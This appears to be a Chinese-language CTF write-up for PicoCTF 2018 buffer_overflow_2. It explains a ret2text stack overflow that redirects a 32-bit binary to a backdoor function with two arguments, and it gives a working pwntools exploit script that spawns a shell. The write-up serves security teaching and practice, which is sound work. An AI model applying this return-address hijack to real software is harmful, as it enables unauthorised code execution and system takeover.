PicoCTF_2018_buffer_overflow_2

• ret2text
• 32位程序函数参数劫持

1. vuln函数中存在溢出
2. 存在后门函数
3. 构造payload跳转到后门函数得到shell

这里要注意,跳转到后门函数的同时要传入两个参数a1 & a2,缺失参数会导致eof错误

from pwn import *
io = process('./PicoCTF_2018_buffer_overflow_2')
padding = b'A'*(0x6c+4)
payload = padding+p32(0x080485CB)+p32(0)+p32(0xDEADBEEF)+p32(0xDEADC0DE)
io.sendlineafter(b'Please enter your string:',payload)
io.interactive()

本栏目推荐文章
• UWSP Pointer Overflow CTF
• P4429 [BJOI2018] 染色
• AT_joisc2018_b 题解
• P4383 [八省联考 2018] 林克卡特树
• P6305 [eJOI2018] 循环排序
• PicoCTF_2018_buffer_overflow_2
• pytorch反向传播错误解决：RuntimeError: Trying to backward through the graph a second time, but the buffers have already been freed. Specify retain_graph=True when calling backward the first time.
• P9247 [集训队互测 2018] 完美的队列题解
• PicoCTF_2018_buffer_overflow_1
• 用Maven Protocol Buffers Plugin自动根据工程下的proto文件编译

buffer_overflow overflow PicoCTF buffer 2018buffer_overflow overflow picoctf buffer buffer_overflow rop_chain picoctf chain 2018 picoctf chain 2018 pwn overflow detected buffer问题 picoctf picoctf 2023 overflow overflowed text-overflow